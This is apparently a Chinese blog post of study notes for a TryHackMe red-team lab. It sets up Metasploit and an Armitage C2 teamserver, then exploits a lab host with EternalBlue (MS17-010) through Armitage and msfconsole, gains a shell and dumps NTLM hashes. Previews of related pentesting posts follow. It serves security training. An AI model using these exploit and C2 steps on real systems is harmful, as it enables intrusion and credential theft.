【学习笔记】[THM]Red Teaming--Intro to C2(C2服务器搭建)
设置C2服务器
前提条件—下载msf
采用一款免费的C2服务器–Armitage,他依赖msf框架,所以还是先下载msf
官方给的下载方式
1 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ |
这一步会直接下载好依赖项和msf本身
安装Armitage
下载、构建和安装 Armitage
1 | git clone https://gitlab.com/kalilinux/packages/armitage.git && cd armitage |
然后运行构建脚本(在这一步之前首先要先装有java,版本不能太高java11就行sudo apt install openjdk-11-jdk)
1 | bash package.sh |
这步挺困难的,难在代理问题,经测试是网上十点左右,用香港节点是下载所需的压缩包最快的
这一步结束之后就是检查并验证Armitage是否能够成功构建,构建好的版本在./releases/unix/中
1 | cd ./release/unix/ && ls -la |
准备我们的环境
初始化数据库,在此步骤要退出root账户
1 | msfdb --use-defaults delete |
1 | msfdb --use-defaults init |
启动和连接到 Armitage
先到armitage二进制文件的目录下(比如~/armitage/release/unix),同时要切换成root账户启动服务端(这里ip和密码自定义的)
1 | MSF_DATABASE_CONFIG=/home/用户名/.msf4/database.yml ./teamserver 192.168.28.142 passwd |
设置一下环境变量
1 | echo 'export MSF_DATABASE_CONFIG="$HOME/.msf4/database.yml"' >> ~/.bashrc && source ~/.bashr |
然后就能直接启动了
1 | ./teamserver 192.168.28.142 root |
然后运行客户端
1 | ./armitage |
随便取名
然后就是工具界面了
打靶
啊重启了以后,还是同一个界面👇
端口扫描
在进行这一步之前,要先安装nmap
靶场启动后,先进行端口扫描:Hosts->Nmap Scan->Quick Scan
然后输入靶场地址
扫描结果如下
漏洞利用
看到445端口有开放,再加上是靶场,那大概率就是要打永恒之蓝了,在exp中找到永恒之蓝,然后双击或者拖到页面上的电脑那(这里也是由于网络问题,没有扫出靶机是什么系统的)
然后点击Launch就是利用漏洞
由于网络问题,我利用了三次才成功()
拿shell以后,右键主机->shell->Interact就能进行交互了
然后还是经典的网络问题,交互过程很卡
转换权限
为了更好操作,还是获取msf shell比较好,选择post->multi->manage->shell_to_meterpreter
结果貌似没提成功啊
那就直接用msf了
选择漏洞
1 | use exploit/windows/smb/ms17_010_eternalblue |
设置靶机地址
1 | set RHOST 10.10.191.189 |
设置本地地址
1 | set LHOST 10.17.9.224 |
然后启动
回答房间问题
跑NTLM hash
剩下两个找flag要快的话,根据房间中的路径直接查就行了
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 lan1ocのblog!
相关推荐
2025-06-18
[THM]Web Application Pentesting---Injection Attacks 注入攻击
高阶 SQL 注入二次注入原理用户提供的输入被保存并随后在应用程序的不同部分使用,可能在一些初始处理之后。这种类型的攻击更加隐蔽,因为恶意 SQL 代码不需要立即导致 SQL 语法错误或其他明显问题,这使得它更难使用标准输入验证技术进行检测。当数据被检索并在 SQL 命令中使用时,第二次使用数据时,会发生注入 说白了,举个例子,有个更新数据的功能点,你之前添加的那一条数据项是恶意的sql语句,在执行这个功能后,他会被检索并当作正常sql语句执行,从而导致注入攻击 实践将所有书籍的标题更新为 “compromised”首先就是有个插入数据的网页先插个数据看看,显示了新插入的数据然后有一个更新数据的网页点击更新的数据包是这样这里看不出啥,从代码层面来分析就是 1234567if ( isset($_POST['update'])) { $unique_id = $_POST['update']; $ssn = $_POST['ssn_' . $unique_id]; $new_book_name...
2025-05-28
[THM]Web Application Pentesting---Authentication 认证
基础sessioncookie属性Secure - 向浏览器指示 Cookie 只能通过经过验证的 HTTPS 通道传输。如果存在证书错误或使用 HTTP,则不会传输 Cookie 值HTTPOnly - 向浏览器指示客户端 JavaScript 可能无法读取 Cookie 值Expire - 向浏览器指示 Cookie 值何时不再有效,应将其删除SameSite - 向浏览器指示是否可以在跨站点请求中传输 Cookie,以帮助防止 CSRF 攻击 tokenToken-Based Session Management最常见的令牌类型之一是 JSON Web 令牌 (JWT),一般形式 1Authorization: Bearer <token> 以前的盲点浏览器中不仅仅要注意cookie,还要注意本地存储的 JWT它没有使用浏览器的自动 cookie 管理功能,而是依赖于客户端代码来完成该过程。身份验证后,Web 应用程序会在请求正文中提供令牌。然后使用客户端 JavaScript 代码,此令牌将存储在浏览器的 LocalStorage...
2025-03-02
【学习笔记】[THM]Red Teaming--Red Team Recon(信息收集)
内置工具(系统可识别并自下载的)whois一般能查到以下信息: 12345678910Registrar WHOIS server 注册 WHOIS 服务器Registrar URL 注册 URLRecord creation date 记录创建日期Record update date 记录更新日期Registrant contact info and address (unless withheld for privacy)注册人的联系信息和地址(除非出于隐私考虑而保留)Admin contact info and address (unless withheld for privacy)管理员联系信息和地址(除非出于隐私原因而保留)Tech contact info and address (unless withheld for privacy)技术联系信息和地址(除非出于隐私原因而隐瞒) 但一般都会有隐瞒,以我博客为例,基本全隐瞒了 nslookup使用默认 DNS 服务器来获取与域相关的 A 和 AAAA...
2025-04-11
【学习笔记】[THM]Linux Privilege Escalation(linux提权)
信息收集假设已经拿下权限,那就先收集下这台机器的信息 主机名1hostname 系统信息1uname -a 内核版本和其他数据的信息1cat /proc/version /etc/issue 系统版本1cat /etc/issue 看进程1234ps -A:查看所有正在运行的进程ps axjf:查看进程树(请参阅下面的树结构,直到运行 ps axjf)ps aux:aux 选项将显示所有用户的进程 (a),显示启动进程的用户 (u),并显示未连接到终端的进程 (x)。查看 ps aux 命令输出,我们可以更好地了解系统和潜在漏洞。 一般直接用 1ps -aux 看环境变量1env 重点看path变量PATH 变量可能具有编译器或脚本语言(例如 Python),可用于在目标系统上运行代码或用于权限提升。 看允许用户使用 root 权限运行哪些命令(鸡肋,要密码)1sudo -l 看用户组1id 也可看其他用户 1id root /etc/passwd1cat...
2025-04-22
【学习笔记】[THM]Windows Privilege Escalation(windows提权)
基本知识点Administrators组可以更改系统配置SYSTEM / LocalSystem 帐户比管理员用户具有更多的权限Local Service用于以“最低”权限运行 Windows 服务的默认帐户。它将通过网络使用匿名连接Network Service用于以“最低”权限运行 Windows 服务的默认帐户。它将使用计算机凭据通过网络进行身份验证 收集密码的常用位置无人值守的 Windows 安装在大量主机上安装 Windows 时,管理员可以使用 Windows...
2025-03-13
【学习笔记】[THM]ffuf
基本使用直接扫网站就行了,根据之前的提示 1./ffuf -u http://10.10.127.184/FUZZ -w ../SecLists/Discovery/Web-Content/big.txt 回答问题:您找到的第一个状态代码为 200 的文件是什么? 查找页面和目录使用通用文件列表(如 raft-medium-files-lowercase.txt)开始枚举 1./ffuf -u http://10.10.127.184/FUZZ -w ../SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt 对应第一个问题:您找到的是什么文本文件? 尝试仅针对索引页面的常见扩展 1./ffuf -u http://10.10.127.184/indexFUZZ -w ../SecLists/Discovery/Web-Content/web-extensions.txt 对应第二个问题:为索引页找到哪两个文件扩展名? 从此单词列表中排除 4 个字母的扩展名,因为它会导致许多误报 1./ffuf -u...
